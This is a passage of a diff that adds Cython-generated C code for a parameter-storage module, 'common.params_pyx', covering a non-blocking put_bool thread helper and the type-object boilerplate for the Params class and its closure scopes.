__Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_Thread); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 111, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_PyDict_NewPresized(1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 111, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_4 = __Pyx_CyFunction_New(&__pyx_mdef_6common_10params_pyx_20put_bool_nonblocking_lambda1, 0, __pyx_n_s_put_bool_nonblocking_locals_lamb, ((PyObject*)__pyx_cur_scope), __pyx_n_s_common_params_pyx, __pyx_d, NULL); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 111, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (PyDict_SetItem(__pyx_t_2, __pyx_n_s_target, __pyx_t_4) < 0) __PYX_ERR(0, 111, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_4 = __Pyx_PyObject_Call(__pyx_t_3, __pyx_empty_tuple, __pyx_t_2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 111, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_4, __pyx_n_s_start); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 111, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_4 = NULL; + __pyx_t_5 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_2))) { + __pyx_t_4 = PyMethod_GET_SELF(__pyx_t_2); + if (likely(__pyx_t_4)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); + __Pyx_INCREF(__pyx_t_4); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_2, function); + __pyx_t_5 = 1; + } + } + { + PyObject *__pyx_callargs[1] = {__pyx_t_4, }; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_5, 0+__pyx_t_5); + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 111, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + } + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "common/params_pyx.pyx":110 + * threading.Thread(target=lambda: Params(d).put(key, val)).start() + * + * def put_bool_nonblocking(key, bool val, d=""): # <<<<<<<<<<<<<< + * threading.Thread(target=lambda: Params(d).put_bool(key, val)).start() + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("common.params_pyx.put_bool_nonblocking", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_DECREF((PyObject *)__pyx_cur_scope); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_tp_new_6common_10params_pyx_Params(PyTypeObject *t, PyObject *a, PyObject *k) { + PyObject *o; + #if CYTHON_COMPILING_IN_LIMITED_API + allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); + o = alloc_func(t, 0); + #else + if (likely(!__Pyx_PyType_HasFeature(t, Py_TPFLAGS_IS_ABSTRACT))) { + o = (*t->tp_alloc)(t, 0); + } else { + o = (PyObject *) PyBaseObject_Type.tp_new(t, __pyx_empty_tuple, 0); + } + if (unlikely(!o)) return 0; + #endif + if (unlikely(__pyx_pw_6common_10params_pyx_6Params_1__cinit__(o, a, k) < 0)) goto bad; + return o; + bad: + Py_DECREF(o); o = 0; + return NULL; +} + +static void __pyx_tp_dealloc_6common_10params_pyx_Params(PyObject *o) { + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && (!PyType_IS_GC(Py_TYPE(o)) || !__Pyx_PyObject_GC_IsFinalized(o))) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_6common_10params_pyx_Params) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + { + PyObject *etype, *eval, *etb; + PyErr_Fetch(&etype, &eval, &etb); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) + 1); + __pyx_pw_6common_10params_pyx_6Params_3__dealloc__(o); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) - 1); + PyErr_Restore(etype, eval, etb); + } + (*Py_TYPE(o)->tp_free)(o); +} + +static PyMethodDef __pyx_methods_6common_10params_pyx_Params[] = { + {"clear_all", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_10params_pyx_6Params_5clear_all, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"check_key", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_10params_pyx_6Params_7check_key, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"get", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_10params_pyx_6Params_9get, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"get_bool", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_10params_pyx_6Params_11get_bool, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"put", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_10params_pyx_6Params_13put, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_6common_10params_pyx_6Params_12put}, + {"put_bool", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_10params_pyx_6Params_15put_bool, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"remove", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_10params_pyx_6Params_17remove, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"get_param_path", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_10params_pyx_6Params_19get_param_path, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"all_keys", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_10params_pyx_6Params_21all_keys, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_10params_pyx_6Params_23__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_10params_pyx_6Params_25__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_type_6common_10params_pyx_Params_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc_6common_10params_pyx_Params}, + {Py_tp_methods, (void *)__pyx_methods_6common_10params_pyx_Params}, + {Py_tp_new, (void *)__pyx_tp_new_6common_10params_pyx_Params}, + {0, 0}, +}; +static PyType_Spec __pyx_type_6common_10params_pyx_Params_spec = { + "common.params_pyx.Params", + sizeof(struct __pyx_obj_6common_10params_pyx_Params), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE, + __pyx_type_6common_10params_pyx_Params_slots, +}; +#else + +static PyTypeObject __pyx_type_6common_10params_pyx_Params = { + PyVarObject_HEAD_INIT(0, 0) + "common.params_pyx.""Params", /*tp_name*/ + sizeof(struct __pyx_obj_6common_10params_pyx_Params), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc_6common_10params_pyx_Params, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + 0, /*tp_repr*/ + 0, /*tp_as_number*/ + 0, /*tp_as_sequence*/ + 0, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + 0, /*tp_str*/ + 0, /*tp_getattro*/ + 0, /*tp_setattro*/ + 0, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE, /*tp_flags*/ + 0, /*tp_doc*/ + 0, /*tp_traverse*/ + 0, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + __pyx_methods_6common_10params_pyx_Params, /*tp_methods*/ + 0, /*tp_members*/ + 0, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + 0, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new_6common_10params_pyx_Params, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif + +static struct __pyx_obj_6common_10params_pyx___pyx_scope_struct__put_nonblocking *__pyx_freelist_6common_10params_pyx___pyx_scope_struct__put_nonblocking[8]; +static int __pyx_freecount_6common_10params_pyx___pyx_scope_struct__put_nonblocking = 0; + +static PyObject *__pyx_tp_new_6common_10params_pyx___pyx_scope_struct__put_nonblocking(PyTypeObject *t, CYTHON_UNUSED PyObject *a, CYTHON_UNUSED PyObject *k) { + PyObject *o; + #if CYTHON_COMPILING_IN_LIMITED_API + allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); + o = alloc_func(t, 0); + #else + if (CYTHON_COMPILING_IN_CPYTHON && likely((int)(__pyx_freecount_6common_10params_pyx___pyx_scope_struct__put_nonblocking > 0) & (int)(t->tp_basicsize == sizeof(struct __pyx_obj_6common_10params_pyx___pyx_scope_struct__put_nonblocking)))) { + o = (PyObject*)__pyx_freelist_6common_10params_pyx___pyx_scope_struct__put_nonblocking[--__pyx_freecount_6common_10params_pyx___pyx_scope_struct__put_nonblocking]; + memset(o, 0, sizeof(struct __pyx_obj_6common_10params_pyx___pyx_scope_struct__put_nonblocking)); + (void) PyObject_INIT(o, t); + PyObject_GC_Track(o); + } else { + o = (*t->tp_alloc)(t, 0); + if (unlikely(!o)) return 0; + } + #endif + return o; +} + +static void __pyx_tp_dealloc_6common_10params_pyx___pyx_scope_struct__put_nonblocking(PyObject *o) { + struct __pyx_obj_6common_10params_pyx___pyx_scope_struct__put_nonblocking *p = (struct __pyx_obj_6common_10params_pyx___pyx_scope_struct__put_nonblocking *)o; + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && !__Pyx_PyObject_GC_IsFinalized(o)) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_6common_10params_pyx___pyx_scope_struct__put_nonblocking) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + PyObject_GC_UnTrack(o); + Py_CLEAR(p->__pyx_v_d); + Py_CLEAR(p->__pyx_v_key); + Py_CLEAR(p->__pyx_v_val); + if (CYTHON_COMPILING_IN_CPYTHON && ((int)(__pyx_freecount_6common_10params_pyx___pyx_scope_struct__put_nonblocking < 8) & (int)(Py_TYPE(o)->tp_basicsize == sizeof(struct __pyx_obj_6common_10params_pyx___pyx_scope_struct__put_nonblocking)))) { + __pyx_freelist_6common_10params_pyx___pyx_scope_struct__put_nonblocking[__pyx_freecount_6common_10params_pyx___pyx_scope_struct__put_nonblocking++] = ((struct __pyx_obj_6common_10params_pyx___pyx_scope_struct__put_nonblocking *)o); + } else { + (*Py_TYPE(o)->tp_free)(o); + } +} + +static int __pyx_tp_traverse_6common_10params_pyx___pyx_scope_struct__put_nonblocking(PyObject *o, visitproc v, void *a) { + int e; + struct __pyx_obj_6common_10params_pyx___pyx_scope_struct__put_nonblocking *p = (struct __pyx_obj_6common_10params_pyx___pyx_scope_struct__put_nonblocking *)o; + if (p->__pyx_v_d) { + e = (*v)(p->__pyx_v_d, a); if (e) return e; + } + if (p->__pyx_v_key) { + e = (*v)(p->__pyx_v_key, a); if (e) return e; + } + if (p->__pyx_v_val) { + e = (*v)(p->__pyx_v_val, a); if (e) return e; + } + return 0; +} + +static int __pyx_tp_clear_6common_10params_pyx___pyx_scope_struct__put_nonblocking(PyObject *o) { + PyObject* tmp; + struct __pyx_obj_6common_10params_pyx___pyx_scope_struct__put_nonblocking *p = (struct __pyx_obj_6common_10params_pyx___pyx_scope_struct__put_nonblocking *)o; + tmp = ((PyObject*)p->__pyx_v_d); + p->__pyx_v_d = Py_None; Py_INCREF(Py_None); + Py_XDECREF(tmp); + tmp = ((PyObject*)p->__pyx_v_key); + p->__pyx_v_key = Py_None; Py_INCREF(Py_None); + Py_XDECREF(tmp); + tmp = ((PyObject*)p->__pyx_v_val); + p->__pyx_v_val = Py_None; Py_INCREF(Py_None); + Py_XDECREF(tmp); + return 0; +} +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_type_6common_10params_pyx___pyx_scope_struct__put_nonblocking_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc_6common_10params_pyx___pyx_scope_struct__put_nonblocking}, + {Py_tp_traverse, (void *)__pyx_tp_traverse_6common_10params_pyx___pyx_scope_struct__put_nonblocking}, + {Py_tp_clear, (void *)__pyx_tp_clear_6common_10params_pyx___pyx_scope_struct__put_nonblocking}, + {Py_tp_new, (void *)__pyx_tp_new_6common_10params_pyx___pyx_scope_struct__put_nonblocking}, + {0, 0}, +}; +static PyType_Spec __pyx_type_6common_10params_pyx___pyx_scope_struct__put_nonblocking_spec = { + "common.params_pyx.__pyx_scope_struct__put_nonblocking", + sizeof(struct __pyx_obj_6common_10params_pyx___pyx_scope_struct__put_nonblocking), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, + __pyx_type_6common_10params_pyx___pyx_scope_struct__put_nonblocking_slots, +}; +#else + +static PyTypeObject __pyx_type_6common_10params_pyx___pyx_scope_struct__put_nonblocking = { + PyVarObject_HEAD_INIT(0, 0) + "common.params_pyx.""__pyx_scope_struct__put_nonblocking", /*tp_name*/ + sizeof(struct __pyx_obj_6common_10params_pyx___pyx_scope_struct__put_nonblocking), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc_6common_10params_pyx___pyx_scope_struct__put_nonblocking, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + 0, /*tp_repr*/ + 0, /*tp_as_number*/ + 0, /*tp_as_sequence*/ + 0, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + 0, /*tp_str*/ + 0, /*tp_getattro*/ + 0, /*tp_setattro*/ + 0, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, /*tp_flags*/ + 0, /*tp_doc*/ + __pyx_tp_traverse_6common_10params_pyx___pyx_scope_struct__put_nonblocking, /*tp_traverse*/ + __pyx_tp_clear_6common_10params_pyx___pyx_scope_struct__put_nonblocking, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + 0, /*tp_methods*/ + 0, /*tp_members*/ + 0, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + 0, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new_6common_10params_pyx___pyx_scope_struct__put_nonblocking, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif + +static struct __pyx_obj_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking *__pyx_freelist_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking[8]; +static int __pyx_freecount_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking = 0; + +static PyObject *__pyx_tp_new_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking(PyTypeObject *t, CYTHON_UNUSED PyObject *a, CYTHON_UNUSED PyObject *k) { + PyObject *o; + #if CYTHON_COMPILING_IN_LIMITED_API + allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); + o = alloc_func(t, 0); + #else + if (CYTHON_COMPILING_IN_CPYTHON && likely((int)(__pyx_freecount_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking > 0) & (int)(t->tp_basicsize == sizeof(struct __pyx_obj_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking)))) { + o = (PyObject*)__pyx_freelist_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking[--__pyx_freecount_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking]; + memset(o, 0, sizeof(struct __pyx_obj_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking)); + (void) PyObject_INIT(o, t); + PyObject_GC_Track(o); + } else { + o = (*t->tp_alloc)(t, 0); + if (unlikely(!o)) return 0; + } + #endif + return o; +} + +static void __pyx_tp_dealloc_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking(PyObject *o) { + struct __pyx_obj_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking *p = (struct __pyx_obj_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking *)o; + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && !__Pyx_PyObject_GC_IsFinalized(o)) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + PyObject_GC_UnTrack(o); + Py_CLEAR(p->__pyx_v_d); + Py_CLEAR(p->__pyx_v_key); + if (CYTHON_COMPILING_IN_CPYTHON && ((int)(__pyx_freecount_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking < 8) & (int)(Py_TYPE(o)->tp_basicsize == sizeof(struct __pyx_obj_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking)))) { + __pyx_freelist_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking[__pyx_freecount_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking++] = ((struct __pyx_obj_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking *)o); + } else { + (*Py_TYPE(o)->tp_free)(o); + } +} + +static int __pyx_tp_traverse_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking(PyObject *o, visitproc v, void *a) { + int e; + struct __pyx_obj_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking *p = (struct __pyx_obj_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking *)o; + if (p->__pyx_v_d) { + e = (*v)(p->__pyx_v_d, a); if (e) return e; + } + if (p->__pyx_v_key) { + e = (*v)(p->__pyx_v_key, a); if (e) return e; + } + return 0; +} + +static int __pyx_tp_clear_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking(PyObject *o) { + PyObject* tmp; + struct __pyx_obj_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking *p = (struct __pyx_obj_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking *)o; + tmp = ((PyObject*)p->__pyx_v_d); + p->__pyx_v_d = Py_None; Py_INCREF(Py_None); + Py_XDECREF(tmp); + tmp = ((PyObject*)p->__pyx_v_key); + p->__pyx_v_key = Py_None; Py_INCREF(Py_None); + Py_XDECREF(tmp); + return 0; +} +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_type_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking}, + {Py_tp_traverse, (void *)__pyx_tp_traverse_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking}, + {Py_tp_clear, (void *)__pyx_tp_clear_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking}, + {Py_tp_new, (void *)__pyx_tp_new_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking}, + {0, 0}, +}; +static PyType_Spec __pyx_type_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking_spec = { + "common.params_pyx.__pyx_scope_struct_1_put_bool_nonblocking", + sizeof(struct __pyx_obj_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, + __pyx_type_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking_slots, +}; +#else + +static PyTypeObject __pyx_type_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking = { + PyVarObject_HEAD_INIT(0, 0) + "common.params_pyx.""__pyx_scope_struct_1_put_bool_nonblocking", /*tp_name*/ + sizeof(struct __pyx_obj_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + 0, /*tp_repr*/ + 0, /*tp_as_number*/ + 0, /*tp_as_sequence*/ + 0, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + 0, /*tp_str*/ + 0, /*tp_getattro*/ + 0, /*tp_setattro*/ + 0, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, /*tp_flags*/ + 0, /*tp_doc*/ + __pyx_tp_traverse_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking, /*tp_traverse*/ + __pyx_tp_clear_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + 0, /*tp_methods*/ + 0, /*tp_members*/ + 0, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + 0, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif + +static int __pyx_tp_traverse___Pyx_EnumMeta(PyObject *o, visitproc v, void *a) { + int e; + if (!(&PyType_Type)->tp_traverse); else { e = (&PyType_Type)->tp_traverse(o,v,a); if (e) return e; } + return 0; +} + +static int __pyx_tp_clear___Pyx_EnumMeta(PyObject *o) { + if (!(&PyType_Type)->tp_clear); else (&PyType_Type)->tp_clear(o); + return 0; +} +static PyObject *__pyx_sq_item___Pyx_EnumMeta(PyObject *o, Py_ssize_t i) { + PyObject *r; + PyObject *x = PyInt_FromSsize_t(i); if(!x) return 0; + r = Py_TYPE(o)->tp_as_mapping->mp_subscript(o, x); + Py_DECREF(x); + return r; +} + +static PyMethodDef __pyx_methods___Pyx_EnumMeta[] = { + {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_8EnumBase_14__Pyx_EnumMeta_7__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_8EnumBase_14__Pyx_EnumMeta_9__setstate_cython__, 